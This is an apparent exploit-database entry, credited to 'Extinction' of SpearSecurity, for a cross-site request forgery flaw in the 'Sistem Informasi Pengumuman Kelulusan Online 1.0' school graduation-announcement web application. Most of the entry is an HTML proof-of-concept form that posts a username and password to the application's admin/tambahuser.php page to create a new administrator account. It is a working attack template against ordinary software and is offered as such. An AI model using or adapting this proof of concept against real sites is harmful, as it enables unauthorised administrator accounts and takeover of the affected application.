Sistem Informasi Pengumuman Kelulusan Online 1.0 CSRF

`# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)  
# Google Dork: N/A  
# Date: 2020-06-10  
# Exploit Author: Extinction  
# Vendor Homepage: https://adikiss.net/  
# Software Link: https://adikiss.net/2014/06/aplikasi-sistem-informasi-pengumuman-kelulusan-online-2/  
# Version: latest  
# Tested on: Linux,windows,macOS  
  
# Description SpearSecurity :  
# CSRF vulnerability was discovered in Sistem kelulusan.  
# With this vulnerability, authorized users can be added to the system.  
  
POC:  
  
<html>  
<body>  
<center>  
<hr>  
<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">  
<input type="text" class="form-control" name="nama"  
placeholder="Username" size="35">  
<br>  
<input type="text" class="form-control" name="username"  
placeholder="Spear" size="35">  
<br>  
<input type="text" class="form-control" name="pass"  
placeholder="Security" size="35">  
<br>  
<br>  
<input type="submit" name="submit" id="submit" value="Simpan Data"  
class="btn btn-primary" onclick="tb_remove()">  
</form>  
<hr>  
<h1> CODED BY SPEAR-SECURITY </h1>  
<h2> Author Extinction </h2>  
</body>  
</html>  
  
#SpearSecurity-ID  
`